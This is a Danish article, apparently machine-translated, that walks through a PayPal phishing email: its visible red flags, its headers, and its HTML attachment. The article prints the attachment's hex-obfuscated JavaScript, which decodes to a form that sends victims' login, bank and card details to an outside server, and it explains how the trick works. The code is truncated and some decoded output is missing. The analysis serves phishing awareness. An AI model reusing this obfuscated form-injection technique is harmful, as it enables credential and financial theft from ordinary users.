Online-sikkerhed, der bryder ned anatomien i en phishing-mail
I dagens verden, hvor alles information er online, er phishing et af de mest populære og ødelæggende onlineangreb, fordi du altid kan rense en virus, men hvis dine bankoplysninger stjæles, har du problemer. Her er en sammenfatning af et sådant angreb, vi modtog.
Tror ikke, at det kun er dine bankoplysninger, der er vigtige: Hvis nogen får kontrol over din konto login, kender de ikke kun oplysningerne i den pågældende konto, men oddsene er, at samme loginoplysninger kan bruges på forskellige andre konti. Og hvis de kompromitterer din e-mail-konto, kan de nulstille alle dine andre adgangskoder.
Så udover at holde stærke og varierende adgangskoder, skal du altid være på udkig efter falske e-mails, som er den rigtige ting. Mens de fleste phishing-forsøg er amatørlige, er nogle ret overbevisende, så det er vigtigt at forstå, hvordan man genkender dem på overfladeniveau, samt hvordan de arbejder under hætten.
Billede af asirap
Undersøgelse Hvad er i ren synsvinkel
Vores eksempel email, som de fleste phishing-forsøg, "meddeler" dig om aktivitet på din PayPal-konto, som under normale omstændigheder ville være alarmerende. Så opfordringen til handling er at bekræfte / gendanne din konto ved at indsende stort set alle de personlige oplysninger, du kan tænke på. Igen er dette ret formel.
Selvom der helt sikkert er undtagelser, er stort set alle phishing- og scam-e-mails indlæst med røde flag direkte i meddelelsen selv. Selvom teksten er overbevisende, kan du som regel finde mange fejl i hele meddelelseslegemet, hvilket indikerer, at meddelelsen ikke er legitim.
Meddelelsesorganet
Ved første øjekast er dette en af de bedre phishing-e-mails, jeg har set. Der er ingen stavemåder eller grammatiske fejl, og verbiage læser alt efter hvad du måske forventer. Der er dog nogle få røde flag, du kan se, når du undersøger indholdet lidt nærmere.
- "Paypal" - Det korrekte tilfælde er "PayPal" (kapital P). Du kan se, at begge variationer bruges i meddelelsen. Virksomhederne er meget bevidste med deres branding, så det er tvivlsomt, at noget sådant ville passere korrekturprocessen.
- "Tillad ActiveX" - Hvor mange gange har du set en legitim web-baseret forretning, størrelsen af Paypal bruger en proprietær komponent, som kun fungerer på en enkelt browser, især når de understøtter flere browsere? Sikker på, et sted derude gør noget selskab, men det er et rødt flag.
- "Sikkert." - Bemærk hvordan dette ord ikke rækker i margen med resten af afsnitsteksten. Selvom jeg strækker vinduet lidt mere, kan det ikke vikle eller rumme korrekt.
- "Paypal!" - Rummet inden udråbstegn ser utilsigtet ud. Bare en anden quirk, som jeg er sikker på, ikke ville være i en legitim email.
- "PayPal-kontoopdateringsformular.pdf.htm" - Hvorfor skulle Paypal vedhæfte en "PDF", især når de bare kunne linke til en side på deres websted? Desuden, hvorfor ville de forsøge at forkæle en HTML-fil som en PDF? Dette er det største røde flag for dem alle.
Meddelelsesoverskriften
Når du kigger på meddelelsesoverskriften, vises et par flere røde flag:
- Fra adressen er [email protected].
- Adressen mangler. Jeg har ikke udfyldt dette ud, det er simpelthen ikke en del af standardmeddelelsesoverskriften. Et firma, der har dit navn, vil typisk tilpasse e-mailen til dig.
Vedhæftningen
Når jeg åbner vedhæftet fil, kan du straks se, at layoutet ikke er korrekt, da det mangler stiloplysninger. Igen, hvorfor ville PayPal sende en HTML-formular, da de bare kunne give dig et link på deres websted?
Bemærk: Vi brugte Gmail's indbyggede HTML-vedhæftningsviser til dette, men vi anbefaler, at du IKKE ÅBNE vedhæftede filer fra svindlere. Aldrig. Nogensinde. De indeholder meget ofte udbytter, der installerer trojanere på din pc for at stjæle din kontooplysninger.
Rulning lidt mere, du kan se, at denne formular ikke blot spørger om vores PayPal-loginoplysninger, men også for bank- og kreditkortoplysninger. Nogle af billederne er brudt.
Det er indlysende, at dette phishing-forsøg går efter alt med ét slag.
Den tekniske sammenbrud
Selvom det skal være ret klart, baseret på, hvad der er klart, at dette er et phishing-forsøg, vil vi nu bryde ned den tekniske sminke af e-mailen og se, hvad vi kan finde.
Oplysninger fra vedhæftet fil
Den første ting at kigge på er HTML-kilden til vedhæftningsformularen, hvilket er hvad der indsender dataene til det falske sted.
Når du hurtigt ser kilden, vises alle links gyldige, da de peger på enten "paypal.com" eller "paypalobjects.com", som begge er legitiske.
Nu skal vi se på nogle grundlæggende sideoplysninger, som Firefox samler på siden.
Som du kan se, bliver nogle af grafikerne trukket fra domænerne "blessedtobe.com", "goodhealthpharmacy.com" og "pic-upload.de" i stedet for de legitime PayPal-domæner.
Oplysninger fra e-mail-overskrifterne
Dernæst tager vi et kig på de rå e-mail-meddelelsesoverskrifter. Gmail gør det tilgængeligt via menuen Vis originalmenu på meddelelsen.
Når man ser på headerinformationen for den oprindelige meddelelse, kan du se, at denne meddelelse blev komponeret ved hjælp af Outlook Express 6. Jeg tvivler på, at PayPal har nogen på personale, som sender hver af disse meddelelser manuelt via en forældet e-mail-klient.
Nu ser vi på routingsoplysningerne, vi kan se IP-adressen til både afsenderen og relaying mailserveren.
IP-adressen "Bruger" er den oprindelige afsender. Hvis du hurtigt kigger på IP-informationen, kan vi se, at den afsendende IP er i Tyskland.
Og når vi ser på relaying mail serverens (mail.itak.at), IP-adresse vi kan se dette er en internetudbyder baseret i Østrig. Jeg tvivler på, at PayPal ruter deres e-mails direkte via en Østrig-baseret internetudbyder, når de har en massiv servergård, der nemt kunne håndtere denne opgave.
Hvor går dataene hen??
Så vi har klart fastslået, at dette er en phishing-email og samlet nogle oplysninger om, hvor meddelelsen stammer fra, men hvad med, hvor dine data er sendt?
For at se dette skal vi først gemme HTM vedhæftet fil gøre vores skrivebord og åbne i et tekstredigeringsprogram. Rulning gennem det ser alt ud til at være i orden, undtagen når vi kommer til en mistænkelig udseende Javascript-blok.
Gennembrud af den fulde kilde til den sidste blok af Javascript ser vi:
// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x =”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”; y =”; for (i = 0; i
Når som helst du ser en stor jumbled streng af tilsyneladende tilfældige bogstaver og tal indlejret i en Javascript-blok, er det normalt noget mistænkeligt. Ser man på koden, er variablen "x" sat til denne store streng og afkodes derefter til variablen "y". Det endelige resultat af variabel "y" skrives derefter til dokumentet som HTML.
Da den store streng er lavet af tal 0-9 og bogstaverne a-f, er det højst sandsynligt kodet via en simpel ASCII til Hex-konvertering:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
Oversætter til:
Det er ikke tilfældigt, at dette afkodes til en gyldig HTML-formular, som sender resultaterne ikke til PayPal, men til en skurksted.
Når du også ser HTML-kilden til formularen, vil du se, at denne formularkode ikke er synlig, fordi den genereres dynamisk via Javascript. Dette er en smart måde at skjule, hvad HTML rent faktisk gør, hvis nogen blot skulle se den genererede kilde til vedhæftet fil (som vi gjorde tidligere) i modsætning til at åbne vedhæftet fil direkte i en tekstredigeringsprogram.
Kører en hurtig whois på det fornærmende websted, vi kan se dette er et domæne hostet hos en populær webhost, 1and1.
Hvad der skiller sig ud er, at domænet bruger et læsbart navn (i modsætning til noget som "dfh3sjhskjhw.net") og domænet er registreret i 4 år. På grund af dette tror jeg, at dette domæne blev kapret og brugt som en bonde i dette phishing-forsøg.
Cynicism er et godt forsvar
Når det kommer til at være sikker på nettet, gør det aldrig ondt at have en god cynisme.
Selvom jeg er sikker på, at der er flere røde flag i eksemplet email, er det vi har påpeget ovenfor indikatorer, vi så efter blot et par minutters undersøgelse. Hypotetisk, hvis overfladeniveauet af e-mailen efterlignede sin legitime modpart 100%, ville den tekniske analyse stadig afsløre sin sande natur. Derfor importeres det for at kunne undersøge både hvad du kan og ikke kan se.